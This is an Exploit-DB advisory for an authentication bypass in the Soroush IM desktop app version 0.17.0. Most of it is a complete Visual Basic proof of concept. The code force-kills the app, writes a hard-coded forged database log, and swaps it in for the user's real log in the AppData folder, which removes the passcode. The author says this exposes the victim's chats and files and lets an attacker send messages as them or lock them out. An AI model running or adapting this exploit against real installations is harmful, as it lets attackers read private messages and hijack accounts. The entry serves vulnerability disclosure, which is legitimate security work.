Soroush IM Desktop App 0.17.0 – Authentication Bypass

  • 作者: VortexNeoX64
    日期: 2018-08-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45171/
  • # Exploit Title: Soroush IM Desktop App 0.17.0 - Authentication Bypass
    # Date: 2018-08-08 
    # Exploit Author: VortexNeoX64
    # Vendor Homepage: https://soroush-app.ir
    # Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe
    # Version: 0.17.0 BETA
    # Tested on: Windows 10 1803 and windows server 2016 14393
     
    # Security Issue:
    # It seems that all databases are encrypted with a constant key and then producing same output 
    # across every other PCs so pushing NO_PASSCODE data ,that was encrypted before, to the databases
    # on any other PC, would process the database valid and remove the passcode. The database entriesd are first 
    # entered in a log file in the same folder of the database, and then the Soroush app pushes the log file 
    # into permanent database. Attacker can unlock the client app with database injection, and bypass the 
    # authentication process. This exploit leads to two important security risks:
    
    # 1.Attacker can access to all the data, chats, images, files and etc. then he/she is able to send andreceive data in behalf of the original user
    # 2.Attacker then may use the exploit to perform an DOS attack. which is done by setting a new passcode for the client without knowing the previews passcode 
    
    # PoC (.NET 4.0 Visual Basic)
    # PoC dose not support Windows XP, try change "\users\" to "\Documents and Settings\" 
    
    Module Module1
    
    Sub Main()
    Console.WriteLine("*** [Souroush IM Local Passcode bypass via database injection] ***")
    Console.WriteLine("*** [Developed by [VortexNeoX64] 2018] ***")
    Console.WriteLine("** [Tested on Windows 10 1803 and windows server 2016 14393 , Soroush version = 0.17.0 BETA] **")
    Console.WriteLine("** [Affected systems: probebly Linux, MacOS and for sureWindows] **")
    Console.WriteLine("** [Vulnerability type: Local & Privilege Escalation [Passcode bypass] ]**")
    Console.WriteLine()
    Console.WriteLine("Press any Key to exploit...")
    Console.ReadKey()
    Dim _temp As Byte() = {237, 4, 235, 105, 158, 3, 1, 16, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0,
    1, 88, 97, 81, 122, 79, 114, 86, 89, 53, 79, 111, 73, 79, 77,
    90, 49, 52, 102, 83, 101, 122, 80, 113, 121, 122, 88, 49, 70,
    65, 108, 56, 52, 116, 112, 87, 75, 77, 117, 115, 122, 117, 109,
    72, 101, 116, 51, 43, 54, 122, 106, 55, 117, 108, 74, 66, 47, 99,
    107, 110, 87, 113, 107, 84, 111, 74, 66, 52, 118, 53, 74, 120, 75,
    47, 114, 122, 57, 122, 73, 53, 116, 43, 76, 122, 68, 116, 86, 81,
    61, 61, 182, 6, 123, 34, 100, 97, 116, 97, 34, 58, 34, 57, 105, 105,
    116, 76, 114, 118, 88, 76, 98, 99, 66, 67, 74, 52, 87, 102, 68, 55,
    106, 66, 82, 72, 109, 110, 113, 66, 57, 110, 82, 85, 90, 81, 54, 85,
    49, 113, 78, 120, 75, 55, 57, 98, 106, 85, 106, 109, 74, 102, 122,
    105, 67, 111, 65, 100, 114, 99, 98, 82, 119, 54, 43, 75, 68, 72, 47,
    108, 85, 82, 90, 77, 119, 73, 103, 70, 113, 57, 75, 57, 112, 115, 57,
    97, 49, 69, 47, 77, 104, 73, 51, 51, 114, 80, 83, 81, 113, 99, 117, 49,
    89, 87, 101, 49, 83, 75, 98, 103, 78, 84, 72, 113, 89, 82, 87, 71, 73,
    43, 88, 111, 85, 105, 69, 55, 72, 120, 121, 120, 57, 50, 90, 116, 116,
    43, 81, 75, 100, 103, 114, 67, 77, 120, 122, 65, 66, 66, 50, 117, 85,
    87, 68, 119, 67, 113, 68, 105, 53, 67, 111, 86, 69, 108, 77, 43, 113,
    90, 106, 118, 75, 100, 66, 99, 112, 120, 99, 47, 110, 80, 84, 67, 55,
    117, 111, 116, 86, 115, 89, 50, 89, 55, 88, 89, 49, 88, 52, 78, 69, 52,
    100, 105, 110, 71, 120, 67, 87, 118, 118, 73, 106, 107, 80, 51, 85, 114,
    75, 48, 51, 100, 67, 114, 71, 85, 75, 119, 98, 70, 48, 85, 101, 73, 50, 77,
    108, 97, 84, 67, 100, 49, 97, 77, 43, 119, 83, 80, 111, 99, 110, 105, 66,
    97, 67, 48, 52, 56, 82, 83, 110, 97, 120, 75, 56, 88, 55, 84, 89, 83, 111,
    65, 111, 115, 98, 117, 78, 80, 66, 110, 103, 72, 52, 110, 68, 97, 112, 74,
    84, 104, 108, 120, 104, 85, 78, 117, 70, 103, 57, 48, 98, 65, 87, 100, 83,
    111, 75, 105, 69, 65, 56, 69, 106, 105, 52, 120, 69, 111, 97, 49, 70, 109,
    73, 49, 69, 83, 110, 67, 66, 117, 114, 76, 111, 70, 75, 53, 73, 111, 81, 49,
    74, 115, 79, 105, 74, 108, 119, 51, 89, 116, 69, 70, 71, 121, 121, 102, 76,
    110, 85, 73, 121, 56, 49, 54, 85, 71, 80, 87, 69, 53, 79, 90, 53, 74, 72, 50,
    66, 117, 84, 47, 79, 90, 65, 77, 111, 57, 88, 115, 88, 68, 105, 77, 121, 108,
    111, 66, 105, 105, 75, 81, 49, 56, 117, 50, 85, 104, 78, 109, 97, 119, 79, 67,
    74, 78, 120, 53, 108, 51, 118, 48, 68, 104, 84, 51, 76, 75, 106, 69, 103, 55, 86,
    84, 115, 79, 80, 65, 121, 118, 54, 90, 90, 83, 118, 82, 51, 67, 118, 109, 66,
    86, 57, 108, 52, 114, 70, 120, 71, 50, 52, 108, 113, 66, 70, 70, 101, 115, 105,
    120, 88, 102, 74, 122, 108, 90, 69, 111, 68, 120, 80, 115, 70, 109, 116, 88, 67,
    65, 110, 65, 86, 106, 70, 74, 54, 49, 80, 67, 104, 104, 84, 120, 67, 116, 115, 82,
    73, 108, 78, 77, 109, 90, 122, 77, 90, 80, 73, 99, 80, 104, 115, 68, 83, 80, 80,
    72, 76, 98, 49, 56, 56, 67, 84, 80, 80, 47, 116, 85, 48, 72, 122, 116, 101, 83, 105,
    68, 47, 66, 97, 84, 107, 50, 104, 102, 121, 82, 66, 114, 72, 78, 75, 56, 118, 89, 101,
    122, 122, 82, 117, 85, 102, 43, 78, 111, 111, 79, 43, 90, 73, 51, 69, 71, 90, 52, 69, 57,
    48, 75, 101, 80, 82, 52, 48, 122, 76, 49, 118, 116, 68, 65, 78, 98, 80, 47, 109, 57,
    122, 53, 87, 83, 105, 113, 118, 110, 47, 111, 66, 69, 78, 51, 100, 67, 72, 106, 120, 80,
    81, 55, 119, 54, 78, 68, 120, 108, 86, 108, 83, 117, 119, 113, 120, 78, 87, 47, 86, 102,
    117, 65, 74, 77, 84, 84, 121, 103, 73, 80, 89, 87, 73, 117, 85, 111, 101, 54, 118, 106, 71,
    83, 69, 118, 101, 78, 80, 72, 121, 99, 99, 88, 122, 90, 76, 122, 71, 90, 102, 66, 85, 87, 81,
    101, 75, 74, 99, 86, 68, 80, 103, 109, 43, 88, 66, 80, 73, 56, 47, 101, 107, 111, 101, 71, 104,
    108, 97, 107, 70, 75, 85, 112, 112, 57, 75, 99, 102, 111, 111, 97, 75, 51, 56, 48, 121, 78, 115,
    87, 118, 52, 119, 88, 51, 65, 116, 51, 118, 111, 114, 74, 81, 101, 119, 117, 89, 97, 76, 78, 114,
    116, 52, 68, 121, 122, 90, 107, 52, 98, 117, 68, 110, 87, 119, 85, 48, 97, 122, 109, 104, 71, 111,
    69, 119, 88, 66, 78, 108, 81, 79, 89, 54, 49, 117, 66, 103, 78, 110, 78, 103, 82, 65, 61, 61,
    34, 44, 34, 116, 121, 112, 101, 34, 58, 34, 112, 114, 105, 109, 105, 116, 105, 118, 101, 34, 125}
    Try
    Console.WriteLine("Killing the app...")
    Shell("Taskkill /im soroush.exe /f /t ", AppWinStyle.Hide, True)
    Console.WriteLine("Making malicious database...")
    Dim target As String = ""
    Dim targetname As String = ""
    Dim index As Integer = 0
    Dim _info As IO.FileInfo()
    Dim _Dirinfo As New IO.DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 1) & ":\Users\" & Environment.UserName & "\AppData\Roaming\Soroush\Data\73b880c1b168541ab6e01acc2f7bf46f06379320\")
    IO.File.WriteAllBytes(Environment.CurrentDirectory & "\log.log", _temp)
    Console.WriteLine("Getting orginal database name....")
    _info = _Dirinfo.GetFiles()
    For i = 0 To _info.Count - 1
    If _info(i).Extension = ".log" Then
    target = _info(i).FullName
    targetname = _info(i).Name
    index = i
    Exit For
    End If
    Next
    Console.WriteLine("Target file is : [" & target & "]")
    Console.WriteLine("Renaming malicious database to [" & targetname & "]")
    IO.File.Move(Environment.CurrentDirectory & "\log.log", Environment.CurrentDirectory & "\" & targetname)
    Console.WriteLine("injecting database [" & target & "]")
    Threading.Thread.Sleep(1500)
    IO.File.Delete(target)
    IO.File.Copy(Environment.CurrentDirectory & "\" & targetname, target)
    Console.WriteLine("Done!")
    Catch ex As Exception
    Console.WriteLine(ex.Message)
    Beep()
    Finally
    Console.ReadKey()
    End Try
    End Sub
    
    End Module